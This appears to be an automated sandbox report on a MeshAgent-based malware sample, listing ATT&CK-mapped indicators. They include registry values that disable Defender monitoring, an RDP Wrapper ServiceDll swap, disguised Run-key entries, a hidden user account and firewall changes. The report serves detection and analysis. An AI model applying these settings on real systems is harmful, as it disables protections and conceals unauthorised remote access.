meshagent | 15dd389f66e269ea795710fa580b7e403d628f281c71ebf4d845dbc7d0bdf394

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 10 IoCs

flow	pid	Process
11	4372	powershell.exe
12	2848	powershell.exe
30	2956	powershell.exe
32	1080	powershell.exe
36	1732	powershell.exe
37	2536	powershell.exe
42	1956	powershell.exe
43	4176	powershell.exe
53	2176	cscript.exe
54	2180	cscript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1732	powershell.exe
1956	powershell.exe
4372	powershell.exe
1080	powershell.exe
2536	powershell.exe
4176	powershell.exe
2204	powershell.exe
2848	powershell.exe
2956	powershell.exe
4572	powershell.exe
4572	powershell.exe
4788	powershell.exe
1852	powershell.exe
5012	powershell.exe
2984	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 9 IoCs

evasion

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
4928	netsh.exe
4408	netsh.exe
4736	netsh.exe
2916	netsh.exe
4328	netsh.exe
1248	netsh.exe
1128	netsh.exe
468	netsh.exe
816	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 10 IoCs

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "C:\\Program Files\\RDP Wrapper\\rdpwrap.dll"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe

Sets file to hidden 1 TTPs 4 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2104	attrib.exe
5072	attrib.exe
2292	attrib.exe
4588	attrib.exe

Sets service image path in registry 2 TTPs 1 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" "	s.exe

Executes dropped EXE 24 IoCs

pid	Process
1892	MeshAgent.exe
4192	MeshAgent.exe
4072	MeshAgent.exe
1236	RDPWInst.exe
1240	MeshAgent.exe
5012	RDPWInst.exe
1600	RDPWInst.exe
4148	MeshAgent.exe
3640	RDPWInst.exe
1764	RDPWInst.exe
1180	MeshAgent.exe
3056	RDPWInst.exe
2392	RDPWInst.exe
4696	MeshAgent.exe
2016	RDPWInst.exe
3360	RDPWInst.exe
2940	MeshAgent.exe
388	RDPWInst.exe
748	RDPWInst.exe
4052	MeshAgent.exe
1464	MeshAgent.exe
1852	MeshAgent.exe
2080	MeshAgent.exe
4148	MeshAgent.exe

Loads dropped DLL 7 IoCs

pid	Process
4460	svchost.exe
1424	svchost.exe
544	svchost.exe
1188	svchost.exe
1564	svchost.exe
928	svchost.exe
3140	svchost.exe

Adds Run key to start application 2 TTPs 2 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsPowerup = "C:\\ProgramData\\Windata\\srlhost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdatez = "C:\\ProgramData\\Windata\\WindowsUpdate.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
46	raw.githubusercontent.com
50	raw.githubusercontent.com
53	raw.githubusercontent.com
54	raw.githubusercontent.com
38	raw.githubusercontent.com
39	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 5 IoCs

Winlogon Helper DLL

T1547.004

Modify Registry

persistence privilege_escalation

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\dll\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wkernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ole32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wuser32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wkernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wkernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ole32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wgdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\MeshService.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\oleaut32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wwin32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wwin32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wgdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wrpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wgdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\DLL\wkernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wkernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wkernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\oleaut32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\exe\MeshService.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wgdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\DLL\wkernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wgdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\Kernel.Appcore.pdb	MeshAgent.exe

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist\t1 = "0"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\RDP Wrapper\helper\autoupdate__info.txt	powershell.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\RDPWInst.exe	cmd.exe
File created	C:\Program Files\RDP Wrapper\autoupdate.zip	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_new.ini	cscript.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\usage.txt	powershell.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.exe	s.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\termsrv.dll	cmd.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\usage.txt	powershell.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\RDPWInst.exe	cmd.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\rdpwrap_ini_updater.bat	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\autoupdate.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\re-install.bat	powershell.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\termsrv.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\helper\autoupdate__info.txt	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap_new.ini	cscript.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.msh	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\update.zip	powershell.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\helper\autoupdate__disable_autorun_on_startup.bat	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\rdpwrap_ini_updater.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File created	C:\Program Files\RDP Wrapper\autoupdate.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\re-install.bat	powershell.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\helper\autoupdate__disable_autorun_on_startup.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5028	sc.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 27 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	s.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4668	PING.EXE
3832	PING.EXE

Modifies data under HKEY_USERS 16 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133742652690259216"	MeshAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wmic.exe	wmic.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
